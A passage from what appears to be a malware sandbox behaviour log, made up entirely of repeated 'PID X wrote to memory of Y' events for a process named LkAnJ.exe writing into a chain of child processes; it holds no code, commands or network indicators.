LkAnJ.exe 242 PID 2732 wrote to memory of 392 2732 LkAnJ.exe 242 PID 2732 wrote to memory of 392 2732 LkAnJ.exe 242 PID 2732 wrote to memory of 392 2732 LkAnJ.exe 242 PID 392 wrote to memory of 2800 392 LkAnJ.exe 243 PID 392 wrote to memory of 2800 392 LkAnJ.exe 243 PID 392 wrote to memory of 2800 392 LkAnJ.exe 243 PID 392 wrote to memory of 2800 392 LkAnJ.exe 243 PID 392 wrote to memory of 2800 392 LkAnJ.exe 243 PID 392 wrote to memory of 2800 392 LkAnJ.exe 243 PID 392 wrote to memory of 2784 392 LkAnJ.exe 244 PID 392 wrote to memory of 2784 392 LkAnJ.exe 244 PID 392 wrote to memory of 2784 392 LkAnJ.exe 244 PID 392 wrote to memory of 2784 392 LkAnJ.exe 244 PID 392 wrote to memory of 2764 392 LkAnJ.exe 245 PID 392 wrote to memory of 2764 392 LkAnJ.exe 245 PID 392 wrote to memory of 2764 392 LkAnJ.exe 245 PID 392 wrote to memory of 2764 392 LkAnJ.exe 245 PID 2764 wrote to memory of 2788 2764 LkAnJ.exe 246 PID 2764 wrote to memory of 2788 2764 LkAnJ.exe 246 PID 2764 wrote to memory of 2788 2764 LkAnJ.exe 246 PID 2764 wrote to memory of 2788 2764 LkAnJ.exe 246 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 247 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 247 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 247 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 247 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 247 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 247 PID 2788 wrote to memory of 1852 2788 LkAnJ.exe 248 PID 2788 wrote to memory of 1852 2788 LkAnJ.exe 248 PID 2788 wrote to memory of 1852 2788 LkAnJ.exe 248 PID 2788 wrote to memory of 1852 2788 LkAnJ.exe 248 PID 2788 wrote to memory of 2900 2788 LkAnJ.exe 249 PID 2788 wrote to memory of 2900 2788 LkAnJ.exe 249 PID 2788 wrote to memory of 2900 2788 LkAnJ.exe 249 PID 2788 wrote to memory of 2900 2788 LkAnJ.exe 249 PID 2900 wrote to memory of 2860 2900 LkAnJ.exe 250 PID 2900 wrote to memory of 2860 2900 LkAnJ.exe 250 PID 2900 wrote to memory of 2860 2900 LkAnJ.exe 250 PID 2900 wrote to memory of 2860 2900 LkAnJ.exe 250 PID 2860 wrote to memory of 2916 2860 LkAnJ.exe 251 PID 2860 wrote to memory of 2916 2860 LkAnJ.exe 251 PID 2860 wrote to memory of 2916 2860 LkAnJ.exe 251 PID 2860 wrote to memory of 2916 2860 LkAnJ.exe 251 PID 2860 wrote to memory of 2916 2860 LkAnJ.exe 251 PID 2860 wrote to memory of 2916 2860 LkAnJ.exe 251 PID 2860 wrote to memory of 2960 2860 LkAnJ.exe 252 PID 2860 wrote to memory of 2960 2860 LkAnJ.exe 252 PID 2860 wrote to memory of 2960 2860 LkAnJ.exe 252 PID 2860 wrote to memory of 2960 2860 LkAnJ.exe 252 PID 2860 wrote to memory of 2992 2860 LkAnJ.exe 253 PID 2860 wrote to memory of 2992 2860 LkAnJ.exe 253 PID 2860 wrote to memory of 2992 2860 LkAnJ.exe 253 PID 2860 wrote to memory of 2992 2860 LkAnJ.exe 253 PID 2992 wrote to memory of 2952 2992 LkAnJ.exe 254 PID 2992 wrote to memory of 2952 2992 LkAnJ.exe 254 PID 2992 wrote to memory of 2952 2992 LkAnJ.exe 254 PID 2992 wrote to memory of 2952 2992 LkAnJ.exe 254 PID 2952 wrote to memory of 2996 2952 LkAnJ.exe 255 PID 2952 wrote to memory of 2996 2952 LkAnJ.exe 255 PID 2952 wrote to memory of 2996 2952 LkAnJ.exe 255 PID 2952 wrote to memory of 2996 2952 LkAnJ.exe 255 PID 2952 wrote to memory of 2996 2952 LkAnJ.exe 255 PID 2952 wrote to memory of 2996 2952 LkAnJ.exe 255 PID 2952 wrote to memory of 3032 2952 LkAnJ.exe 256 PID 2952 wrote to memory of 3032 2952 LkAnJ.exe 256 PID 2952 wrote to memory of 3032 2952 LkAnJ.exe 256 PID 2952 wrote to memory of 3032 2952 LkAnJ.exe 256 PID 2952 wrote to memory of 576 2952 LkAnJ.exe 257 PID 2952 wrote to memory of 576 2952 LkAnJ.exe 257 PID 2952 wrote to memory of 576 2952 LkAnJ.exe 257 PID 2952 wrote to memory of 576 2952 LkAnJ.exe 257 PID 576 wrote to memory of 3040 576 LkAnJ.exe 258 PID 576 wrote to memory of 3040 576 LkAnJ.exe 258 PID 576 wrote to memory of 3040 576 LkAnJ.exe 258 PID 576 wrote to memory of 3040 576 LkAnJ.exe 258 PID 3040 wrote to memory of 1724 3040 LkAnJ.exe 259 PID 3040 wrote to memory of 1724 3040 LkAnJ.exe 259 PID 3040 wrote to memory of 1724 3040 LkAnJ.exe 259 PID 3040 wrote to memory of 1724 3040 LkAnJ.exe 259 PID 3040 wrote to memory of 1724 3040 LkAnJ.exe 259 PID 3040 wrote to memory of 1724 3040 LkAnJ.exe 259 PID 3040 wrote to memory of 2144 3040 LkAnJ.exe 260 PID 3040 wrote to memory of 2144 3040 LkAnJ.exe 260 PID 3040 wrote to memory of 2144 3040 LkAnJ.exe 260 PID 3040 wrote to memory of 2144 3040 LkAnJ.exe 260 PID 3040 wrote to memory of 2136 3040 LkAnJ.exe 261 PID 3040 wrote to memory of 2136 3040 LkAnJ.exe 261 PID 3040 wrote to memory of 2136 3040 LkAnJ.exe 261 PID 3040 wrote to memory of 2136 3040 LkAnJ.exe 261 PID 2136 wrote to memory of 2056 2136 LkAnJ.exe 262 PID 2136 wrote to memory of 2056 2136 LkAnJ.exe 262 PID 2136 wrote to memory of 2056 2136 LkAnJ.exe 262 PID 2136 wrote to memory of 2056 2136 LkAnJ.exe 262 PID 2056 wrote to memory of 2120 2056 LkAnJ.exe 263 PID 2056 wrote to memory of 2120 2056 LkAnJ.exe 263 PID 2056 wrote to memory of 2120 2056 LkAnJ.exe 263 PID 2056 wrote to memory of 2120 2056 LkAnJ.exe 263 PID 2056 wrote to memory of 2120 2056 LkAnJ.exe 263 PID 2056 wrote to memory of 2120 2056 LkAnJ.exe 263 PID 2056 wrote to memory of 2192 2056 LkAnJ.exe 264 PID 2056 wrote to memory of 2192 2056 LkAnJ.exe 264 PID 2056 wrote to memory of 2192 2056 LkAnJ.exe 264 PID 2056 wrote to memory of 2192 2056 LkAnJ.exe 264 PID 2056 wrote to memory of 2128 2056 LkAnJ.exe 265 PID 2056 wrote to memory of 2128 2056 LkAnJ.exe 265 PID 2056 wrote to memory of 2128 2056 LkAnJ.exe 265 PID 2056 wrote to memory of 2128 2056 LkAnJ.exe 265 PID 2128 wrote to memory of 2172 2128 LkAnJ.exe 266 PID 2128 wrote to memory of 2172 2128 LkAnJ.exe 266 PID 2128 wrote to memory of 2172 2128 LkAnJ.exe 266 PID 2128 wrote to memory of 2172 2128 LkAnJ.exe 266 PID 2172 wrote to memory of 2196 2172 LkAnJ.exe 267 PID 2172 wrote to memory of 2196 2172 LkAnJ.exe 267 PID 2172 wrote to memory of 2196 2172 LkAnJ.exe 267 PID 2172 wrote to memory of 2196 2172 LkAnJ.exe 267 PID 2172 wrote to memory of 2196 2172 LkAnJ.exe 267 PID 2172 wrote to memory of 2196 2172 LkAnJ.exe 267 PID 2172 wrote to memory of 2284 2172 LkAnJ.exe 268 PID 2172 wrote to memory of 2284 2172 LkAnJ.exe 268 PID 2172 wrote to memory of 2284 2172 LkAnJ.exe 268 PID 2172 wrote to memory of 2284 2172 LkAnJ.exe 268 PID 2172 wrote to memory of 2308 2172 LkAnJ.exe 269 PID 2172 wrote to memory of 2308 2172 LkAnJ.exe 269 PID 2172 wrote to memory of 2308 2172 LkAnJ.exe 269 PID 2172 wrote to memory of 2308 2172 LkAnJ.exe 269 PID 2308 wrote to memory of 2268 2308 LkAnJ.exe 270 PID 2308 wrote to memory of 2268 2308 LkAnJ.exe 270 PID 2308 wrote to memory of 2268 2308 LkAnJ.exe 270 PID 2308 wrote to memory of 2268 2308 LkAnJ.exe 270 PID 2268 wrote to memory of 2488 2268 LkAnJ.exe 271 PID 2268 wrote to memory of 2488 2268 LkAnJ.exe 271 PID 2268 wrote to memory of 2488 2268 LkAnJ.exe 271 PID 2268 wrote to memory of 2488 2268 LkAnJ.exe 271 PID 2268 wrote to memory of 2488 2268 LkAnJ.exe 271 PID 2268 wrote to memory of 2488 2268 LkAnJ.exe 271 PID 2268 wrote to memory of 2484 2268 LkAnJ.exe 272 PID 2268 wrote to memory of 2484 2268 LkAnJ.exe 272 PID 2268 wrote to memory of 2484 2268 LkAnJ.exe 272 PID 2268 wrote to memory of 2484 2268 LkAnJ.exe 272 PID 2268 wrote to memory of 2516 2268 LkAnJ.exe 273 PID 2268 wrote to memory of 2516 2268 LkAnJ.exe 273 PID 2268 wrote to memory of 2516 2268 LkAnJ.exe 273 PID 2268 wrote to memory of 2516 2268 LkAnJ.exe 273 PID 2516 wrote to memory of 2568 2516 LkAnJ.exe 274 PID 2516 wrote to memory of 2568 2516 LkAnJ.exe 274 PID 2516 wrote to memory of 2568 2516 LkAnJ.exe 274 PID 2516 wrote to memory of 2568 2516 LkAnJ.exe 274 PID 2568 wrote to memory of 2552 2568 LkAnJ.exe 275 PID 2568 wrote to memory of 2552 2568 LkAnJ.exe 275 PID 2568 wrote to memory of 2552 2568 LkAnJ.exe 275 PID 2568 wrote to memory of 2552 2568 LkAnJ.exe 275 PID 2568 wrote to memory of 2552 2568 LkAnJ.exe 275 PID 2568 wrote to memory of 2552 2568 LkAnJ.exe 275 PID 2568 wrote to memory of 1800 2568 LkAnJ.exe 276 PID 2568 wrote to memory of 1800 2568 LkAnJ.exe 276 PID 2568 wrote to memory of 1800 2568 LkAnJ.exe 276 PID 2568 wrote to memory of 1800 2568 LkAnJ.exe 276 PID 2568 wrote to memory of 2596 2568 LkAnJ.exe 277 PID 2568 wrote to memory of 2596 2568 LkAnJ.exe 277 PID 2568 wrote to memory of 2596 2568 LkAnJ.exe 277 PID 2568 wrote to memory of 2596 2568 LkAnJ.exe 277 PID 2596 wrote to memory of 2560 2596 LkAnJ.exe 278 PID 2596 wrote to memory of 2560 2596 LkAnJ.exe 278 PID 2596 wrote to memory of 2560 2596 LkAnJ.exe 278 PID 2596 wrote to memory of 2560 2596 LkAnJ.exe 278 PID 2560 wrote to memory of 2688 2560 LkAnJ.exe 279 PID 2560 wrote to memory of 2688 2560 LkAnJ.exe 279 PID 2560 wrote to memory of 2688 2560 LkAnJ.exe 279 PID 2560 wrote to memory of 2688 2560 LkAnJ.exe 279 PID 2560 wrote to memory of 2688 2560 LkAnJ.exe 279 PID 2560 wrote to memory of 2688 2560 LkAnJ.exe 279 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 280 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 280 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 280 PID 2560 wrote to memory of 2592 2560 LkAnJ.exe 280 PID 2560 wrote to memory of 2720 2560 LkAnJ.exe 281 PID 2560 wrote to memory of 2720 2560 LkAnJ.exe 281 PID 2560 wrote to memory of 2720 2560 LkAnJ.exe 281 PID 2560 wrote to memory of 2720 2560 LkAnJ.exe 281 PID 2720 wrote to memory of 2732 2720 LkAnJ.exe 282 PID 2720 wrote to memory of 2732 2720 LkAnJ.exe 282 PID 2720 wrote to memory of 2732 2720 LkAnJ.exe 282 PID 2720 wrote to memory of 2732 2720 LkAnJ.exe 282 PID 2732 wrote to memory of 432 2732 LkAnJ.exe 283 PID 2732 wrote to memory of 432 2732 LkAnJ.exe 283 PID 2732 wrote to memory of 432 2732 LkAnJ.exe 283 PID 2732 wrote to memory of 432 2732 LkAnJ.exe 283 PID 2732 wrote to memory of 432 2732 LkAnJ.exe 283 PID 2732 wrote to memory of 432 2732 LkAnJ.exe 283 PID 2732 wrote to memory of 480 2732 LkAnJ.exe 284 PID 2732 wrote to memory of 480 2732 LkAnJ.exe 284 PID 2732 wrote to memory of 480 2732 LkAnJ.exe 284 PID 2732 wrote to memory of 480 2732 LkAnJ.exe 284 PID 2732 wrote to memory of 2784 2732 LkAnJ.exe 285 PID 2732 wrote to memory of 2784 2732 LkAnJ.exe 285 PID 2732 wrote to memory of 2784 2732 LkAnJ.exe 285 PID 2732 wrote to memory of 2784 2732 LkAnJ.exe 285 PID 2784 wrote to memory of 2012 2784 LkAnJ.exe 286 PID 2784 wrote to memory of 2012 2784 LkAnJ.exe 286 PID 2784 wrote to memory of 2012 2784 LkAnJ.exe 286 PID 2784 wrote to memory of 2012 2784 LkAnJ.exe 286 PID 2012 wrote to memory of 2848 2012 LkAnJ.exe 287 PID 2012 wrote to memory of 2848 2012 LkAnJ.exe 287 PID 2012 wrote to memory of 2848 2012 LkAnJ.exe 287 PID 2012 wrote to memory of 2848 2012 LkAnJ.exe 287 PID 2012 wrote to memory of 2848 2012 LkAnJ.exe 287 PID 2012 wrote to memory of 2848 2012 LkAnJ.exe 287 PID 2012 wrote to memory of 2836 2012 LkAnJ.exe 288 PID 2012 wrote to memory of 2836 2012 LkAnJ.exe 288 PID 2012 wrote to memory of 2836 2012 LkAnJ.exe 288 PID 2012 wrote to memory of 2836 2012 LkAnJ.exe 288 PID 2012 wrote to memory of 2868 2012 LkAnJ.exe 289 PID 2012 wrote to memory of 2868 2012 LkAnJ.exe 289 PID 2012 wrote to memory of 2868 2012 LkAnJ.exe 289 PID 2012 wrote to memory of 2868 2012 LkAnJ.exe 289 PID 2868 wrote to memory of 2876 2868 LkAnJ.exe 290 PID 2868 wrote to memory of 2876 2868 LkAnJ.exe 290 PID 2868 wrote to memory of 2876 2868 LkAnJ.exe 290 PID 2868 wrote to memory of 2876 2868 LkAnJ.exe 290 PID 2876 wrote to memory of 2856 2876 LkAnJ.exe 291 PID 2876 wrote to memory of 2856 2876 LkAnJ.exe 291 PID 2876 wrote to memory of 2856 2876 LkAnJ.exe 291 PID 2876 wrote to memory of 2856 2876 LkAnJ.exe 291 PID 2876 wrote to memory of 2856 2876 LkAnJ.exe 291 PID 2876 wrote to memory of 2856 2876 LkAnJ.exe 291 PID 2876 wrote to memory of 2976 2876 LkAnJ.exe 292 PID 2876 wrote to memory of 2976 2876 LkAnJ.exe 292 PID 2876 wrote to memory of 2976 2876 LkAnJ.exe 292 PID 2876 wrote to memory of 2976 2876 LkAnJ.exe 292 PID 2876 wrote to memory of 1664 2876 LkAnJ.exe 293 PID 2876 wrote to memory of 1664 2876 LkAnJ.exe 293 PID 2876 wrote to memory of 1664 2876 LkAnJ.exe 293 PID 2876 wrote to memory of 1664 2876 LkAnJ.exe 293 PID 1664 wrote to memory of 2948 1664 LkAnJ.exe 294 PID 1664 wrote to memory of 2948 1664 LkAnJ.exe 294 PID 1664 wrote to memory of 2948 1664 LkAnJ.exe 294 PID 1664 wrote to memory of 2948 1664 LkAnJ.exe 294 PID 2948 wrote to memory of 1472 2948 LkAnJ.exe 295 PID 2948 wrote to memory of 1472 2948 LkAnJ.exe 295 PID 2948 wrote to memory of 1472 2948 LkAnJ.exe 295 PID 2948 wrote to memory of 1472 2948 LkAnJ.exe 295 PID 2948 wrote to memory of 1472 2948 LkAnJ.exe 295 PID 2948 wrote to memory of 1472 2948 LkAnJ.exe 295 PID 2948 wrote to memory of 1216 2948 LkAnJ.exe 296 PID 2948 wrote to memory of 1216 2948 LkAnJ.exe 296 PID 2948 wrote to memory of 1216 2948 LkAnJ.exe 296 PID 2948 wrote to memory of 1216 2948 LkAnJ.exe 296 PID 2948 wrote to memory of 576 2948 LkAnJ.exe 297 PID 2948 wrote to memory of 576 2948 LkAnJ.exe 297 PID 2948 wrote to memory of 576 2948 LkAnJ.exe 297 PID 2948 wrote to memory of 576 2948 LkAnJ.exe 297 PID 576 wrote to memory of 2000 576 LkAnJ.exe 298 PID 576 wrote to memory of 2000 576 LkAnJ.exe 298 PID 576 wrote to memory of 2000 576 LkAnJ.exe 298 PID 576 wrote to memory of 2000 576 LkAnJ.exe 298 PID 2000 wrote to memory of 1228 2000 LkAnJ.exe 299 PID 2000 wrote to memory of 1228 2000 LkAnJ.exe 299 PID 2000 wrote to memory of 1228 2000 LkAnJ.exe 299 PID 2000 wrote to memory of 1228 2000 LkAnJ.exe 299 PID 2000 wrote to memory of 1228 2000 LkAnJ.exe 299 PID 2000 wrote to memory of 1228 2000 LkAnJ.exe 299 PID 2000 wrote to memory of 2140 2000 LkAnJ.exe 300 PID 2000 wrote to memory of 2140 2000 LkAnJ.exe 300 PID 2000 wrote to memory of 2140 2000 LkAnJ.exe 300 PID 2000 wrote to memory of 2140 2000 LkAnJ.exe 300 PID 2000 wrote to memory of 2096 2000 LkAnJ.exe 301 PID 2000 wrote to memory of 2096 2000 LkAnJ.exe 301 PID 2000 wrote to memory of 2096 2000 LkAnJ.exe 301 PID 2000 wrote to memory of 2096 2000 LkAnJ.exe 301 PID 2096 wrote to memory of 2232 2096 LkAnJ.exe 302 PID 2096 wrote to memory of 2232 2096 LkAnJ.exe 302 PID 2096 wrote to memory of 2232 2096 LkAnJ.exe 302 PID 2096 wrote to memory of 2232 2096 LkAnJ.exe 302 PID 2232 wrote to memory of 2176 2232 LkAnJ.exe 303 PID 2232 wrote to memory of 2176 2232 LkAnJ.exe 303 PID 2232 wrote to memory of 2176 2232 LkAnJ.exe 303 PID 2232 wrote to memory of 2176 2232 LkAnJ.exe 303 PID 2232 wrote to memory of 2176 2232 LkAnJ.exe 303 PID 2232 wrote to memory of 2176 2232 LkAnJ.exe 303 PID 2232 wrote to memory of 1792 2232 LkAnJ.exe 304 PID 2232 wrote to memory of 1792 2232 LkAnJ.exe 304 PID 2232 wrote to memory of 1792 2232 LkAnJ.exe 304 PID 2232 wrote to memory of 1792 2232 LkAnJ.exe 304 PID 2232 wrote to memory of 2152 2232 LkAnJ.exe 305 PID 2232 wrote to memory of 2152 2232 LkAnJ.exe 305 PID 2232 wrote to memory of 2152 2232 LkAnJ.exe 305 PID 2232 wrote to memory of 2152 2232 LkAnJ.exe 305 PID 2152 wrote to memory of 2244 2152 LkAnJ.exe 306 PID 2152 wrote to memory of 2244 2152 LkAnJ.exe 306 PID 2152 wrote to memory of 2244 2152 LkAnJ.exe 306 PID 2152 wrote to memory of 2244 2152 LkAnJ.exe 306 PID 2244 wrote to memory of 2280 2244 LkAnJ.exe 307 PID 2244 wrote to memory of 2280 2244 LkAnJ.exe 307 PID 2244 wrote to memory of 2280 2244 LkAnJ.exe 307 PID 2244 wrote to memory of 2280 2244 LkAnJ.exe 307 PID 2244 wrote to memory of 2280 2244 LkAnJ.exe 307 PID 2244 wrote to memory of 2280 2244 LkAnJ.exe 307 PID 2244 wrote to memory of 2296 2244 LkAnJ.exe 308 PID 2244 wrote to memory of 2296 2244 LkAnJ.exe 308 PID 2244 wrote to memory of 2296 2244 LkAnJ.exe 308 PID 2244 wrote to memory of 2296 2244 LkAnJ.exe 308 PID 2244 wrote to memory of 2324 2244 LkAnJ.exe 309 PID 2244 wrote to memory of 2324 2244 LkAnJ.exe 309 PID 2244 wrote to memory of 2324 2244 LkAnJ.exe 309 PID 2244 wrote to memory of 2324 2244 LkAnJ.exe 309 PID 2324 wrote to memory of 2504 2324 LkAnJ.exe 310 PID 2324 wrote to memory of 2504 2324 LkAnJ.exe 310 PID 2324 wrote to memory of 2504 2324 LkAnJ.exe 310 PID 2324 wrote to memory of 2504 2324 LkAnJ.exe 310 PID 2504 wrote to memory of 2528 2504 LkAnJ.exe 311 PID 2504 wrote to memory of 2528 2504 LkAnJ.exe 311 PID 2504 wrote to memory of 2528 2504 LkAnJ.exe 311 PID 2504 wrote to memory of 2528 2504 LkAnJ.exe 311 PID 2504 wrote to memory of 2528 2504 LkAnJ.exe 311 PID 2504 wrote to memory of 2528 2504 LkAnJ.exe 311 PID 2504 wrote to memory of 1448 2504 LkAnJ.exe 312 PID 2504 wrote to memory of 1448 2504 LkAnJ.exe 312 PID 2504 wrote to memory of 1448 2504 LkAnJ.exe 312 PID 2504 wrote to memory of 1448 2504 LkAnJ.exe 312 PID 2504 wrote to memory of 2516 2504 LkAnJ.exe 313 PID 2504 wrote to memory of 2516 2504 LkAnJ.exe 313 PID 2504 wrote to memory of 2516 2504 LkAnJ.exe 313 PID 2504 wrote to memory of 2516 2504 LkAnJ.exe 313 PID 2516 wrote to memory of 2536 2516 LkAnJ.exe 314 PID 2516 wrote to memory of 2536 2516 LkAnJ.exe 314 PID 2516 wrote to memory of 2536 2516 LkAnJ.exe 314 PID 2516 wrote to memory of 2536 2516 LkAnJ.exe 314 PID 2536 wrote to memory of 2644 2536 LkAnJ.exe 315 PID 2536 wrote to memory of 2644 2536 LkAnJ.exe 315 PID 2536 wrote to memory of 2644 2536 LkAnJ.exe 315 PID 2536 wrote to memory of 2644 2536 LkAnJ.exe 315 PID 2536 wrote to memory of 2644 2536 LkAnJ.exe 315 PID 2536 wrote to memory of 2644 2536 LkAnJ.exe 315 PID 2536 wrote to memory of 2608 2536 LkAnJ.exe 316 PID 2536 wrote to memory of 2608 2536 LkAnJ.exe 316 PID 2536 wrote to memory of 2608 2536 LkAnJ.exe 316 PID 2536 wrote to memory of 2608 2536 LkAnJ.exe 316 PID 2536 wrote to memory of 2652 2536 LkAnJ.exe 317 PID 2536 wrote to memory of 2652 2536 LkAnJ.exe 317 PID 2536 wrote to memory of 2652 2536 LkAnJ.exe 317 PID 2536 wrote to memory of 2652 2536 LkAnJ.exe 317 PID 2652 wrote to memory of 2760 2652 LkAnJ.exe 318 PID 2652 wrote to memory of 2760 2652 LkAnJ.exe 318 PID 2652 wrote to memory of 2760 2652 LkAnJ.exe 318 PID 2652 wrote to memory of 2760 2652 LkAnJ.exe 318 PID 2760 wrote to memory of 2700 2760 LkAnJ.exe 319 PID 2760 wrote to memory of 2700 2760 LkAnJ.exe 319 PID 2760 wrote to memory of 2700 2760 LkAnJ.exe 319 PID 2760 wrote to memory of 2700 2760 LkAnJ.exe 319 PID 2760 wrote to memory of 2700 2760 LkAnJ.exe 319 PID 2760 wrote to memory of 2700 2760 LkAnJ.exe 319 PID 2760 wrote to memory of 2592 2760 LkAnJ.exe 320 PID 2760 wrote to memory of 2592 2760 LkAnJ.exe 320 PID 2760 wrote to memory of 2592 2760 LkAnJ.exe 320 PID 2760 wrote to memory of 2592 2760 LkAnJ.exe 320 PID 2760 wrote to memory of 2808 2760 LkAnJ.exe 321 PID 2760 wrote to memory of 2808 2760 LkAnJ.exe 321 PID 2760 wrote to memory of 2808 2760 LkAnJ.exe 321 PID 2760 wrote to memory of 2808 2760 LkAnJ.exe 321 PID 2808 wrote to memory of 2764 2808 LkAnJ.exe 322 PID 2808 wrote to memory of 2764 2808 LkAnJ.exe 322 PID 2808 wrote to memory of 2764 2808 LkAnJ.exe 322 PID 2808 wrote to memory of 2764 2808 LkAnJ.exe 322 PID 2764 wrote to memory of 1536 2764 LkAnJ.exe 323 PID 2764 wrote to memory of 1536 2764 LkAnJ.exe 323 PID 2764 wrote to memory of 1536 2764 LkAnJ.exe 323 PID 2764 wrote to memory of 1536 2764 LkAnJ.exe 323 PID 2764 wrote to memory of 1536 2764 LkAnJ.exe 323 PID 2764 wrote to memory of 1536 2764 LkAnJ.exe 323 PID 2764 wrote to memory of 2824 2764 LkAnJ.exe 324 PID 2764 wrote to memory of 2824 2764 LkAnJ.exe 324 PID 2764 wrote to memory of 2824 2764 LkAnJ.exe 324 PID 2764 wrote to memory of 2824 2764 LkAnJ.exe 324 PID 2764 wrote to memory of 2832 2764 LkAnJ.exe 325 PID 2764 wrote to memory of 2832 2764 LkAnJ.exe 325 PID 2764 wrote to memory of 2832 2764 LkAnJ.exe 325 PID 2764 wrote to memory of 2832 2764 LkAnJ.exe 325 PID 2832 wrote to memory of 2848 2832 LkAnJ.exe 326 PID 2832 wrote to memory of 2848 2832 LkAnJ.exe 326 PID 2832 wrote to memory of 2848 2832 LkAnJ.exe 326 PID 2832 wrote to memory of 2848 2832 LkAnJ.exe 326 PID 2848 wrote to memory of 916 2848 LkAnJ.exe 327 PID 2848 wrote to memory of 916 2848 LkAnJ.exe 327 PID 2848 wrote to memory of 916 2848 LkAnJ.exe 327 PID 2848 wrote to memory of 916 2848 LkAnJ.exe 327 PID 2848 wrote to memory of 916 2848 LkAnJ.exe 327 PID 2848 wrote to memory of 916 2848 LkAnJ.exe 327 PID 2848 wrote to memory of 1852 2848 LkAnJ.exe 328 PID 2848 wrote to memory of 1852 2848 LkAnJ.exe 328 PID 2848 wrote to memory of 1852 2848 LkAnJ.exe 328 PID 2848 wrote to memory of 1852 2848 LkAnJ.exe 328 PID 2848 wrote to memory of 2964 2848 LkAnJ.exe 329 PID 2848 wrote to memory of 2964 2848 LkAnJ.exe 329 PID 2848 wrote to memory of 2964 2848 LkAnJ.exe 329 PID 2848 wrote to memory of 2964 2848 LkAnJ.exe 329 PID 2964 wrote to memory of 1356 2964 LkAnJ.exe 330 PID 2964 wrote to memory of 1356 2964 LkAnJ.exe 330 PID 2964 wrote to memory of 1356 2964 LkAnJ.exe 330 PID 2964 wrote to memory of 1356 2964 LkAnJ.exe 330 PID 1356 wrote to memory of 2976 1356 LkAnJ.exe 331 PID 1356 wrote to memory of 2976 1356 LkAnJ.exe 331 PID 1356 wrote to memory of 2976 1356 LkAnJ.exe 331 PID 1356 wrote to memory of 2976 1356 LkAnJ.exe 331 PID 1356 wrote to memory of 2976 1356 LkAnJ.exe 331 PID 1356 wrote to memory of 2976 1356 LkAnJ.exe 331 PID 1356 wrote to memory of 1664 1356 LkAnJ.exe 332 PID 1356 wrote to memory of 1664 1356 LkAnJ.exe 332 PID 1356 wrote to memory of 1664 1356 LkAnJ.exe 332 PID 1356 wrote to memory of 1664 1356 LkAnJ.exe 332 PID 1356 wrote to memory of 3004 1356 LkAnJ.exe 333 PID 1356 wrote to memory of 3004 1356 LkAnJ.exe 333 PID 1356 wrote to memory of 3004 1356 LkAnJ.exe 333 PID 1356 wrote to memory of 3004 1356 LkAnJ.exe 333 PID 3004 wrote to memory of 1836 3004 LkAnJ.exe 334 PID 3004 wrote to memory of 1836 3004 LkAnJ.exe 334 PID 3004 wrote to memory of 1836 3004 LkAnJ.exe 334 PID 3004 wrote to memory of 1836 3004 LkAnJ.exe 334 PID 1836 wrote to memory of 3036 1836 LkAnJ.exe 335 PID 1836 wrote to memory of 3036 1836 LkAnJ.exe 335 PID 1836 wrote to memory of 3036 1836 LkAnJ.exe 335 PID 1836 wrote to memory of 3036 1836 LkAnJ.exe 335 PID 1836 wrote to memory of 3036 1836 LkAnJ.exe 335 PID 1836 wrote to memory of 3036 1836 LkAnJ.exe 335 PID 1836 wrote to memory of 576 1836 LkAnJ.exe 336 PID 1836 wrote to memory of 576 1836 LkAnJ.exe 336 PID 1836 wrote to memory of 576 1836 LkAnJ.exe 336 PID 1836 wrote to memory of 576 1836 LkAnJ.exe 336 PID 1836 wrote to memory of 2080 1836 LkAnJ.exe 337 PID 1836 wrote to memory of 2080 1836 LkAnJ.exe 337 PID 1836 wrote to memory of 2080 1836 LkAnJ.exe 337 PID 1836 wrote to memory of 2080 1836 LkAnJ.exe 337 PID 2080 wrote to memory of 1584 2080 LkAnJ.exe 338 PID 2080 wrote to memory of 1584 2080 LkAnJ.exe 338 PID 2080 wrote to memory of 1584 2080 LkAnJ.exe 338 PID 2080 wrote to memory of 1584 2080 LkAnJ.exe 338 PID 1584 wrote to memory of 2168 1584 LkAnJ.exe 339 PID 1584 wrote to memory of 2168 1584 LkAnJ.exe 339 PID 1584 wrote to memory of 2168 1584 LkAnJ.exe 339 PID 1584 wrote to memory of 2168 1584 LkAnJ.exe 339 PID 1584 wrote to memory of 2168 1584 LkAnJ.exe 339 PID 1584 wrote to memory of 2168 1584 LkAnJ.exe 339 PID 1584 wrote to memory of 2204 1584 LkAnJ.exe 340 PID 1584 wrote to memory of 2204 1584 LkAnJ.exe 340 PID 1584 wrote to memory of 2204 1584 LkAnJ.exe 340 PID 1584 wrote to memory of 2204 1584 LkAnJ.exe 340 PID 1584 wrote to memory of 1688 1584 LkAnJ.exe 341 PID 1584 wrote to memory of 1688 1584 LkAnJ.exe 341 PID 1584 wrote to memory of 1688 1584 LkAnJ.exe 341 PID 1584 wrote to memory of 1688 1584 LkAnJ.exe 341 PID 1688 wrote to memory of 1452 1688 LkAnJ.exe 342 PID 1688 wrote to memory of 1452 1688 LkAnJ.exe 342 PID 1688 wrote to memory of 1452 1688 LkAnJ.exe 342 PID 1688 wrote to memory of 1452 1688 LkAnJ.exe 342 PID 1452 wrote to memory of 2256 1452 LkAnJ.exe 343 PID 1452 wrote to memory of 2256 1452 LkAnJ.exe 343 PID 1452 wrote to memory of 2256 1452 LkAnJ.exe 343 PID 1452 wrote to memory of 2256 1452 LkAnJ.exe 343 PID 1452 wrote to memory of 2256 1452 LkAnJ.exe 343 PID 1452 wrote to memory of 2256 1452 LkAnJ.exe 343 PID 1452 wrote to memory of 2216 1452 LkAnJ.exe 344 PID 1452 wrote to memory of 2216 1452 LkAnJ.exe 344 PID 1452 wrote to memory of 2216 1452 LkAnJ.exe 344 PID 1452 wrote to memory of 2216 1452 LkAnJ.exe 344 PID 1452 wrote to memory of 2320 1452 LkAnJ.exe 345 PID 1452 wrote to memory of 2320 1452 LkAnJ.exe 345 PID 1452 wrote to memory of 2320 1452 LkAnJ.exe 345 PID 1452 wrote to memory of 2320 1452 LkAnJ.exe 345 PID 2320 wrote to memory of 2440 2320 LkAnJ.exe 346 PID 2320 wrote to memory of 2440 2320 LkAnJ.exe 346 PID 2320 wrote to memory of 2440 2320 LkAnJ.exe 346 PID 2320 wrote to memory of 2440 2320 